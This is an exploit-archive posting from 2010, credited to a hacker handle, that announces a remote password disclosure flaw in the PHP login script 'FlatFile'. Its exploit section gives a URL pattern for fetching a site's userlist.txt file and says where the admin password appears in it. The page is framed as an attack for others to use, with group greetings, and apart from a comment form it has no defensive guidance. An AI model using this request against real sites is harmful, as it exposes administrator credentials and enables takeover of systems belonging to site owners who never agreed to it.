FlatFile System remote password disclosure

2010-02-22 / 2010-02-23

Credit: ViRuSMaN

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

==============================================================================
        [?] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [?] FlatFile system Remote Password Disclouse Vulnerability
==============================================================================

    [?] Script:             [ FlatFile ]
    [?] Language:           [ PHP ]
    [?] Download:           [ http://codewalkers.com/codefiles/269_flatfile_login.zip ]
    [?] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [?] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & No-Exploit.com ]
    [?] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [?] http://[target].com/[path]/userlist.txt

 # The Password Before Admin Name in "userlist.txt"



Author: ViRuSMaN <-

###########################################################################
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FlatFile System remote password disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.